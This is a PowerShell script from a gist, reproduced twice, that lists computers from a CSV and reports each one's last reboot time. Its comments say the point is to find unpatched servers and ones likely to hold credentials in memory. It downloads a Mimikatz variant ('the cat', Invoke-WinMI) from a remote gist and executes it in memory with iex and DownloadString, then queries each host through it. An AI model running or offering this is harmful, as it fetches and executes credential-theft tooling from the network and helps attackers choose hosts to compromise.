daniel0x00/Get-ComputerStartTime.ps1

## Get-ComputerStartTime.ps1
##
#
# PowerShell script to retrieve the StartTime (last reboot) of given computers.
# Useful:
#  - For determine which server could be affected for a non-patched vulnerability.
#  - For determine which server could have more credentials in its memory.
# ###
# No admin privilege required to run this script.
# PowerShell version 2 is required.
# ###
# Output: PSObject
#
# Computer                                       StartTime
# --------                                       ---------
# computer-01.lab.local                          14/03/2017 22:27:34
# computer-02.lab.local                          14/03/2017 22:27:34
#
##

# Download and invoke a custom version of 'the cat':
iex(New-Object System.Net.WebClient).downloadstring('https://gist.githubusercontent.com/daniel0x00/3af43e27021ea94ff4d6f1da8d9b209a/raw/Invoke-WinMI.ps1')

# Import all computers from a CSV file and then request the StartTime datetime:
$computers = Import-Csv .\computers.csv
$computers | % {
    $computer = $_.dnshostname;

    $start_time_raw = Invoke-WinMI -Command "`"net::stats $computer`""
    $start_time_parsed = [string](([regex]::Match($start_time_raw,"StatisticsStartTime: (?<datetime>[\d\/]+ \d{2}:\d{2}:\d{2})")).groups["datetime"].value)

    # Out the object to pipeline:
    $out = New-Object -TypeName PSObject
    $out | Add-Member -MemberType NoteProperty -Name Computer -Value $computer
    $out | Add-Member -MemberType NoteProperty -Name StartTime -Value $start_time_parsed
    $out
}
	##
	#
	# PowerShell script to retrieve the StartTime (last reboot) of given computers.
	# Useful:
	# - For determine which server could be affected for a non-patched vulnerability.
	# - For determine which server could have more credentials in its memory.
	# ###
	# No admin privilege required to run this script.
	# PowerShell version 2 is required.
	# ###
	# Output: PSObject
	#
	# Computer StartTime
	# -------- ---------
	# computer-01.lab.local 14/03/2017 22:27:34
	# computer-02.lab.local 14/03/2017 22:27:34
	#
	##

	# Download and invoke a custom version of 'the cat':
	iex(New-Object System.Net.WebClient).downloadstring('https://gist.githubusercontent.com/daniel0x00/3af43e27021ea94ff4d6f1da8d9b209a/raw/Invoke-WinMI.ps1')

	# Import all computers from a CSV file and then request the StartTime datetime:
	$computers = Import-Csv .\computers.csv
	$computers \| % {
	$computer = $_.dnshostname;

	$start_time_raw = Invoke-WinMI -Command "`"net::stats $computer`""
	$start_time_parsed = [string](([regex]::Match($start_time_raw,"StatisticsStartTime: (?<datetime>[\d\/]+ \d{2}:\d{2}:\d{2})")).groups["datetime"].value)

	# Out the object to pipeline:
	$out = New-Object -TypeName PSObject
	$out \| Add-Member -MemberType NoteProperty -Name Computer -Value $computer
	$out \| Add-Member -MemberType NoteProperty -Name StartTime -Value $start_time_parsed
	$out
	}